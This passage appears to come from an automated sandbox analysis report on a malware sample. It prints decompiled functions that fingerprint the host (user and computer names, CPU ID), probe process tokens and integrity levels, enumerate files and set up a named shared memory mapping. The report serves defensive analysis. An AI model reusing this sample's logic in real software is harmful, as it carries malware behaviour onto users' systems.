                                                  • StrChrA.SHLWAPI(?,0000002E), ref: 052D14A7
                                                  • memcpy.NTDLL(00000000,?,00000000), ref: 052D14E0
                                                  • FindNextFileA.KERNELBASE(052D96C1,?), ref: 052D14F5
                                                  • FindClose.KERNEL32(052D96C1), ref: 052D1502
                                                  • FindFirstFileA.KERNEL32(?,?), ref: 052D150E
                                                  • CompareFileTime.KERNEL32(?,?), ref: 052D151E
                                                  • FindClose.KERNELBASE(052D96C1), ref: 052D1553
                                                  • HeapFree.KERNEL32(00000000,00000000,73797325), ref: 052D1565
                                                  • HeapFree.KERNEL32(00000000,?), ref: 052D1575
                                                  Memory Dump Source
                                                  • Source File: 0000001D.00000002.379296556.00000000052D1000.00000020.00020000.sdmp, Offset: 052D0000, based on PE: true
                                                  • Associated: 0000001D.00000002.379282965.00000000052D0000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379323121.00000000052DC000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379335669.00000000052DD000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379354513.00000000052DF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_29_2_52d0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: File$Find$CloseHeapTime$CompareFirst$AllocateEnvironmentExpandFreeNextStrings$ChangeCreateNotificationlstrcatmemcpymemset
                                                  • String ID:
                                                  • API String ID: 2944988578-0
                                                  • Opcode ID: 535779f916799ee5f35d1ac6d10383e1e239dfd857539847a56e51507d21432e
                                                  • Instruction ID: 7bcb5c4cd826efc6cefd3bde21c20b309249ec7754051383348c3bb87ecd934d
                                                  • Opcode Fuzzy Hash: 535779f916799ee5f35d1ac6d10383e1e239dfd857539847a56e51507d21432e
                                                  • Instruction Fuzzy Hash: A38147B1D20109AFDF118FA5EC89AEEBBB9FF44351F10416AE505E6290DB349A50CF70
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 052D83B7, Relevance: 10.6, APIs: 7, Instructions: 81nativeCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  C-Code - Quality: 38%
                                                  			E052D83B7(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E052D2049(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E052D9039(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}



















                                                  0x052d83c4
                                                  0x052d83c5
                                                  0x052d83c6
                                                  0x052d83c7
                                                  0x052d83c8
                                                  0x052d83cc
                                                  0x052d83d3
                                                  0x052d83e2
                                                  0x052d83e5
                                                  0x052d83e8
                                                  0x052d83ef
                                                  0x052d83f2
                                                  0x052d83f5
                                                  0x052d83f8
                                                  0x052d83fb
                                                  0x052d8406
                                                  0x052d8408
                                                  0x052d8411
                                                  0x052d8419
                                                  0x052d841b
                                                  0x052d842d
                                                  0x052d8437
                                                  0x052d843b
                                                  0x052d844a
                                                  0x052d844e
                                                  0x052d8457
                                                  0x052d845f
                                                  0x052d845f
                                                  0x052d8461
                                                  0x052d8461
                                                  0x052d8469
                                                  0x052d846f
                                                  0x052d8473
                                                  0x052d8473
                                                  0x052d847e

                                                  APIs
                                                  • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 052D83FE
                                                  • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 052D8411
                                                  • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 052D842D
                                                    • Part of subcall function 052D2049: RtlAllocateHeap.NTDLL(00000000,00000000,052D7E50), ref: 052D2055
                                                  • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 052D844A
                                                  • memcpy.NTDLL(00000000,00000000,0000001C), ref: 052D8457
                                                  • NtClose.NTDLL(?), ref: 052D8469
                                                  • NtClose.NTDLL(00000000), ref: 052D8473
                                                  Memory Dump Source
                                                  • Source File: 0000001D.00000002.379296556.00000000052D1000.00000020.00020000.sdmp, Offset: 052D0000, based on PE: true
                                                  • Associated: 0000001D.00000002.379282965.00000000052D0000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379323121.00000000052DC000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379335669.00000000052DD000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379354513.00000000052DF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_29_2_52d0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                                  • String ID:
                                                  • API String ID: 2575439697-0
                                                  • Opcode ID: 38e5c6b3818b62279345d695aa1c01557d3057b76a02fce108351f0515039258
                                                  • Instruction ID: 77688509ee74d660c92daefa45f2bccdea56b9e27f42ccde271768dc65667600
                                                  • Opcode Fuzzy Hash: 38e5c6b3818b62279345d695aa1c01557d3057b76a02fce108351f0515039258
                                                  • Instruction Fuzzy Hash: 8921E6B2A10228FBDF119F95DC49AEEBFBDEF08760F104026F905B6150D7719A44DBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 052D6786, Relevance: 16.6, APIs: 11, Instructions: 150timememoryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  C-Code - Quality: 83%
                                                  			E052D6786(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				struct %anon52 _v8;
				long _v12;
				char _v16;
				char _v20;
				signed int _v24;
				intOrPtr _v32;
				union _LARGE_INTEGER _v36;
				intOrPtr _v40;
				void* _v44;
				void _v88;
				char _v92;
				struct %anon52 _t46;
				intOrPtr _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t60;
				long _t64;
				signed int _t65;
				void* _t68;
				void* _t70;
				signed int _t71;
				intOrPtr _t73;
				intOrPtr _t76;
				void** _t78;
				void* _t80;

				_t73 = __edx;
				_v92 = 0;
				memset( &_v88, 0, 0x2c);
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v44 = _t46;
				if(_t46 == 0) {
					_v8.LowPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0x52dd240);
					_v20 = 0;
					_v16 = 0;
					L052DB0C8();
					_v36.LowPart = _t46;
					_v32 = _t73;
					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
					_t51 =  *0x52dd26c; // 0x31c
					_v40 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
					_v8.LowPart = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0x52dd24c = 5;
						} else {
							_t68 = E052D73FD(_t73); // executed
							if(_t68 != 0) {
								goto L4;
							}
						}
						_v12 = 0;
						L6:
						L6:
						if(_v12 == 1 && ( *0x52dd260 & 0x00000001) == 0) {
							_v12 = 2;
						}
						_t71 = _v12;
						_t58 = _t71 << 4;
						_t76 = _t80 + (_t71 << 4) - 0x54;
						_t72 = _t71 + 1;
						_v24 = _t71 + 1;
						_t60 = E052D8504(_t72, _t72, _t80 + _t58 - 0x58, _t76,  &_v20,  &_v16);
						_v8.LowPart = _t60;
						if(_t60 != 0) {
							goto L17;
						}
						_t65 = _v24;
						_t90 = _t65 - 3;
						_v12 = _t65;
						if(_t65 != 3) {
							goto L6;
						} else {
							_v8.LowPart = E052D3BF1(_t72, _t90,  &_v92, _a4, _a8);
						}
						goto L12;
						L17:
						__eflags = _t60 - 0x10d2;
						if(_t60 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0x52dd244);
							goto L21;
						} else {
							__eflags =  *0x52dd248; // 0x0
							if(__eflags == 0) {
								goto L12;
							} else {
								_t60 = E052DA1B0();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0x52dd248);
								L21:
								L052DB0C8();
								_v36.LowPart = _t60;
								_v32 = _t76;
								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
								_t64 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
								__eflags = _t64;
								_v8.LowPart = _t64;
								if(_t64 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t78 =  &_v92;
					_t70 = 3;
					do {
						_t54 =  *_t78;
						if(_t54 != 0) {
							HeapFree( *0x52dd238, 0, _t54);
						}
						_t78 =  &(_t78[4]);
						_t70 = _t70 - 1;
					} while (_t70 != 0);
					CloseHandle(_v44);
				}
				return _v8;
				goto L25;
			}




























                                                  0x052d6786
                                                  0x052d6798
                                                  0x052d679b
                                                  0x052d67a7
                                                  0x052d67af
                                                  0x052d67b2
                                                  0x052d6919
                                                  0x052d67b8
                                                  0x052d67b8
                                                  0x052d67ba
                                                  0x052d67bf
                                                  0x052d67c0
                                                  0x052d67c6
                                                  0x052d67c9
                                                  0x052d67cc
                                                  0x052d67da
                                                  0x052d67e5
                                                  0x052d67e8
                                                  0x052d67ea
                                                  0x052d67f7
                                                  0x052d6801
                                                  0x052d6805
                                                  0x052d6808
                                                  0x052d680d
                                                  0x052d6818
                                                  0x052d6818
                                                  0x052d680f
                                                  0x052d680f
                                                  0x052d6816
                                                  0x00000000
                                                  0x00000000
                                                  0x052d6816
                                                  0x052d6822
                                                  0x00000000
                                                  0x052d6825
                                                  0x052d6829
                                                  0x052d6834
                                                  0x052d6834
                                                  0x052d683b
                                                  0x052d6844
                                                  0x052d684b
                                                  0x052d6854
                                                  0x052d6857
                                                  0x052d685a
                                                  0x052d6861
                                                  0x052d6864
                                                  0x00000000
                                                  0x00000000
                                                  0x052d6866
                                                  0x052d6869
                                                  0x052d686c
                                                  0x052d686f
                                                  0x00000000
                                                  0x052d6871
                                                  0x052d6880
                                                  0x052d6880
                                                  0x00000000
                                                  0x052d68ae
                                                  0x052d68ae
                                                  0x052d68b3
                                                  0x052d68d2
                                                  0x052d68d4
                                                  0x052d68d9
                                                  0x052d68da
                                                  0x00000000
                                                  0x052d68b5
                                                  0x052d68b5
                                                  0x052d68bb
                                                  0x00000000
                                                  0x052d68bd
                                                  0x052d68bd
                                                  0x052d68c2
                                                  0x052d68c4
                                                  0x052d68c9
                                                  0x052d68ca
                                                  0x052d68e0
                                                  0x052d68e0
                                                  0x052d68e8
                                                  0x052d68f3
                                                  0x052d68f6
                                                  0x052d6901
                                                  0x052d6903
                                                  0x052d6905
                                                  0x052d6908
                                                  0x00000000
                                                  0x052d690e
                                                  0x00000000
                                                  0x052d690e
                                                  0x052d6908
                                                  0x052d68bb
                                                  0x00000000
                                                  0x052d68b3
                                                  0x052d6883
                                                  0x052d6885
                                                  0x052d6888
                                                  0x052d6889
                                                  0x052d6889
                                                  0x052d688d
                                                  0x052d6897
                                                  0x052d6897
                                                  0x052d689d
                                                  0x052d68a0
                                                  0x052d68a0
                                                  0x052d68a6
                                                  0x052d68a6
                                                  0x052d6923
                                                  0x00000000

                                                  APIs
                                                  • memset.NTDLL ref: 052D679B
                                                  • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 052D67A7
                                                  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 052D67CC
                                                  • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 052D67E8
                                                  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 052D6801
                                                  • HeapFree.KERNEL32(00000000,00000000), ref: 052D6897
                                                  • CloseHandle.KERNEL32(?), ref: 052D68A6
                                                  • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 052D68E0
                                                  • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,052D2417,?), ref: 052D68F6
                                                  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 052D6901
                                                    • Part of subcall function 052D73FD: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,073093C0,?,00000000,30314549,00000014,004F0053,0730937C), ref: 052D74E9
                                                    • Part of subcall function 052D73FD: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,052D6814), ref: 052D74FB
                                                  • GetLastError.KERNEL32 ref: 052D6913
                                                  Memory Dump Source
                                                  • Source File: 0000001D.00000002.379296556.00000000052D1000.00000020.00020000.sdmp, Offset: 052D0000, based on PE: true
                                                  • Associated: 0000001D.00000002.379282965.00000000052D0000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379323121.00000000052DC000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379335669.00000000052DD000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379354513.00000000052DF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_29_2_52d0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                                                  • String ID:
                                                  • API String ID: 3521023985-0
                                                  • Opcode ID: e4dd63895c17cdf7ab0aa93d8f3e54d5b2b368f9c2a78af0706fa5cc0a7160f2
                                                  • Instruction ID: 71d05b833fb206636e9e9bed5f2cd3fdb98d4743828eda5cff7384c6b10eba86
                                                  • Opcode Fuzzy Hash: e4dd63895c17cdf7ab0aa93d8f3e54d5b2b368f9c2a78af0706fa5cc0a7160f2
                                                  • Instruction Fuzzy Hash: 56511971925229AADF10DF94EC49DEEFFB9EF49324F204116F815E2190D774AA44CBB0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 052D1B2F, Relevance: 13.6, APIs: 9, Instructions: 72filetimeCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  C-Code - Quality: 74%
                                                  			E052D1B2F(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L052DB0C2();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0x52dd27c; // 0x202a5a8
				_t5 = _t13 + 0x52de862; // 0x7308e0a
				_t6 = _t13 + 0x52de59c; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L052DAD5A();
				_t17 = CreateFileMappingW(0xffffffff, 0x52dd2a8, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}













                                                  0x052d1b2f
                                                  0x052d1b37
                                                  0x052d1b3b
                                                  0x052d1b41
                                                  0x052d1b46
                                                  0x052d1b4b
                                                  0x052d1b4e
                                                  0x052d1b51
                                                  0x052d1b56
                                                  0x052d1b57
                                                  0x052d1b5a
                                                  0x052d1b5f
                                                  0x052d1b66
                                                  0x052d1b70
                                                  0x052d1b72
                                                  0x052d1b73
                                                  0x052d1b76
                                                  0x052d1b92
                                                  0x052d1b98
                                                  0x052d1b9c
                                                  0x052d1bea
                                                  0x052d1b9e
                                                  0x052d1bab
                                                  0x052d1bbb
                                                  0x052d1bc3
                                                  0x052d1bd5
                                                  0x052d1bd9
                                                  0x00000000
                                                  0x00000000
                                                  0x052d1bc5
                                                  0x052d1bc8
                                                  0x052d1bcd
                                                  0x052d1bcf
                                                  0x052d1bcf
                                                  0x052d1bad
                                                  0x052d1baf
                                                  0x052d1bdb
                                                  0x052d1bdc
                                                  0x052d1bdc
                                                  0x052d1bab
                                                  0x052d1bf1

                                                  APIs
                                                  • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,052D22EA,?,?,4D283A53,?,?), ref: 052D1B3B
                                                  • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 052D1B51
                                                  • _snwprintf.NTDLL ref: 052D1B76
                                                  • CreateFileMappingW.KERNELBASE(000000FF,052DD2A8,00000004,00000000,00001000,?), ref: 052D1B92
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,052D22EA,?,?,4D283A53), ref: 052D1BA4
                                                  • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 052D1BBB
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,052D22EA,?,?), ref: 052D1BDC
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,052D22EA,?,?,4D283A53), ref: 052D1BE4
                                                  Memory Dump Source
                                                  • Source File: 0000001D.00000002.379296556.00000000052D1000.00000020.00020000.sdmp, Offset: 052D0000, based on PE: true
                                                  • Associated: 0000001D.00000002.379282965.00000000052D0000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379323121.00000000052DC000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379335669.00000000052DD000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379354513.00000000052DF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_29_2_52d0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                  • String ID:
                                                  • API String ID: 1814172918-0
                                                  • Opcode ID: bc1c63c7554e232fd639938fe91ea62434da9db7e8dbd0c9d7af348445c858c8
                                                  • Instruction ID: de321db07c60219415ff9790086b821972ec583774e2e99e48f89853f375347f
                                                  • Opcode Fuzzy Hash: bc1c63c7554e232fd639938fe91ea62434da9db7e8dbd0c9d7af348445c858c8
                                                  • Instruction Fuzzy Hash: 9A210876A15204BBD711DBA4DC09F99BBB9AF84751F154111F505E71C0EB709900CB70
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 052D269C, Relevance: 12.1, APIs: 8, Instructions: 102memoryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  C-Code - Quality: 96%
                                                  			E052D269C(char __eax, signed int* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t63;
				signed int* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				signed int* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0x52dd270; // 0xd448b889
					_v12 = _t59;
				}
				_t64 = _t69;
				E052D6B43( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0x52dd278 ^ 0x4c0ca0ae;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0x52dd238, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t63 = _t62;
								 *_t69 =  *_t69 ^ E052D2496(_v8 + _v8, _t63);
							}
							HeapFree( *0x52dd238, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0x52dd238, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t63 = _t68;
							_t69[3] = _t69[3] ^ E052D2496(_v8 + _v8, _t63);
						}
						HeapFree( *0x52dd238, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *(_t67 + 8) = _t63;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				_t69[1] = _t69[1] ^ _t39;
				return _t39;
			}




















                                                  0x052d269c
                                                  0x052d26a4
                                                  0x052d26aa
                                                  0x052d26ad
                                                  0x052d26b0
                                                  0x052d26b2
                                                  0x052d26b7
                                                  0x052d26b7
                                                  0x052d26bd
                                                  0x052d26bf
                                                  0x052d26cc
                                                  0x052d272d
                                                  0x052d26ce
                                                  0x052d26d3
                                                  0x052d26d9
                                                  0x052d26de
                                                  0x052d26ec
                                                  0x052d26f0
                                                  0x052d26ff
                                                  0x052d2706
                                                  0x052d270d
                                                  0x052d270d
                                                  0x052d2718
                                                  0x052d2718
                                                  0x052d26f0
                                                  0x052d26de
                                                  0x052d272f
                                                  0x052d2735
                                                  0x052d273f
                                                  0x052d2741
                                                  0x052d2746
                                                  0x052d2755
                                                  0x052d2759
                                                  0x052d2764
                                                  0x052d276b
                                                  0x052d2772
                                                  0x052d2772
                                                  0x052d277e
                                                  0x052d277e
                                                  0x052d2759
                                                  0x052d2787
                                                  0x052d2789
                                                  0x052d278c
                                                  0x052d278e
                                                  0x052d2791
                                                  0x052d2794
                                                  0x052d279e
                                                  0x052d27a2
                                                  0x052d27a6

                                                  APIs
                                                  • GetUserNameW.ADVAPI32(00000000,?), ref: 052D26D3
                                                  • RtlAllocateHeap.NTDLL(00000000,?), ref: 052D26EA
                                                  • GetUserNameW.ADVAPI32(00000000,?), ref: 052D26F7
                                                  • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,052D23D9), ref: 052D2718
                                                  • GetComputerNameW.KERNEL32(00000000,00000000), ref: 052D273F
                                                  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 052D2753
                                                  • GetComputerNameW.KERNEL32(00000000,00000000), ref: 052D2760
                                                  • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,052D23D9), ref: 052D277E
                                                  Memory Dump Source
                                                  • Source File: 0000001D.00000002.379296556.00000000052D1000.00000020.00020000.sdmp, Offset: 052D0000, based on PE: true
                                                  • Associated: 0000001D.00000002.379282965.00000000052D0000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379323121.00000000052DC000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379335669.00000000052DD000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379354513.00000000052DF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_29_2_52d0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: HeapName$AllocateComputerFreeUser
                                                  • String ID:
                                                  • API String ID: 3239747167-0
                                                  • Opcode ID: 8c6555c2b6b81ed4598b5794591fdfc925776d65f1c8e2baf76a52e4145577e2
                                                  • Instruction ID: d41c0bc292e71ac09ad1eea47a8810057067d1082cdec426ae00e289e3993b94
                                                  • Opcode Fuzzy Hash: 8c6555c2b6b81ed4598b5794591fdfc925776d65f1c8e2baf76a52e4145577e2
                                                  • Instruction Fuzzy Hash: 8F311C75A20606EFDB11DFA9D889A6EFBF9FF48320F244029E445E7250DB30ED459B20
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 052D924F, Relevance: 10.6, APIs: 7, Instructions: 75COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  C-Code - Quality: 100%
                                                  			E052D924F(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0x52dd25c > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E052D2049(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E052D9039(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}









                                                  0x052d925c
                                                  0x052d9263
                                                  0x052d926a
                                                  0x052d927e
                                                  0x052d9289
                                                  0x052d92a1
                                                  0x052d92ae
                                                  0x052d92b1
                                                  0x052d92b6
                                                  0x052d92c1
                                                  0x052d92c5
                                                  0x052d92d4
                                                  0x052d92d8
                                                  0x052d92f4
                                                  0x052d92f4
                                                  0x052d92f8
                                                  0x052d92f8
                                                  0x052d92fd
                                                  0x052d9301
                                                  0x052d9307
                                                  0x052d9308
                                                  0x052d930f
                                                  0x052d9315

                                                  APIs
                                                  • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 052D9281
                                                  • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 052D92A1
                                                  • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 052D92B1
                                                  • CloseHandle.KERNEL32(00000000), ref: 052D9301
                                                    • Part of subcall function 052D2049: RtlAllocateHeap.NTDLL(00000000,00000000,052D7E50), ref: 052D2055
                                                  • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 052D92D4
                                                  • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 052D92DC
                                                  • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 052D92EC
                                                  Memory Dump Source
                                                  • Source File: 0000001D.00000002.379296556.00000000052D1000.00000020.00020000.sdmp, Offset: 052D0000, based on PE: true
                                                  • Associated: 0000001D.00000002.379282965.00000000052D0000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379323121.00000000052DC000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379335669.00000000052DD000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379354513.00000000052DF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_29_2_52d0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                                                  • String ID:
                                                  • API String ID: 1295030180-0
                                                  • Opcode ID: d448af2f88922ad8b3f778ae063546d00548880afe6fe5fbc73fa14b718fa5fe
                                                  • Instruction ID: 3c074bb86899983da4d819401353814e58f243d247f3d63070e2e5c43aa53545
                                                  • Opcode Fuzzy Hash: d448af2f88922ad8b3f778ae063546d00548880afe6fe5fbc73fa14b718fa5fe
                                                  • Instruction Fuzzy Hash: C0214A75D14209FFEB009F91DC88EAEBF79EF44315F100065F911A2190DB718A45EB60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 052D6A56, Relevance: 9.1, APIs: 6, Instructions: 60sleepmemorytimeCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  C-Code - Quality: 74%
                                                  			E052D6A56(void* __ecx, void* __edx, intOrPtr _a4) {
				struct _FILETIME _v12;
				void* _t10;
				void* _t12;
				int _t14;
				signed int _t16;
				void* _t18;
				signed int _t19;
				unsigned int _t23;
				void* _t26;
				signed int _t33;

				_t26 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t10 = HeapCreate(0, 0x400000, 0); // executed
				 *0x52dd238 = _t10;
				if(_t10 != 0) {
					 *0x52dd1a8 = GetTickCount();
					_t12 = E052D8F10(_a4);
					if(_t12 == 0) {
						do {
							GetSystemTimeAsFileTime( &_v12);
							_t14 = SwitchToThread();
							_t23 = _v12.dwHighDateTime;
							_t16 = (_t23 << 0x00000020 | _v12.dwLowDateTime) >> 7;
							_push(0);
							_push(9);
							_push(_t23 >> 7);
							_push(_t16);
							L052DB226();
							_t33 = _t14 + _t16;
							_t18 = E052D7E03(_a4, _t33);
							_t19 = 2;
							_t25 = _t33;
							Sleep(_t19 << _t33); // executed
						} while (_t18 == 1);
						if(E052D6B96(_t25) != 0) {
							 *0x52dd260 = 1; // executed
						}
						_t12 = E052D225B(_t26); // executed
					}
				} else {
					_t12 = 8;
				}
				return _t12;
			}













                                                  0x052d6a56
                                                  0x052d6a5c
                                                  0x052d6a5d
                                                  0x052d6a69
                                                  0x052d6a71
                                                  0x052d6a76
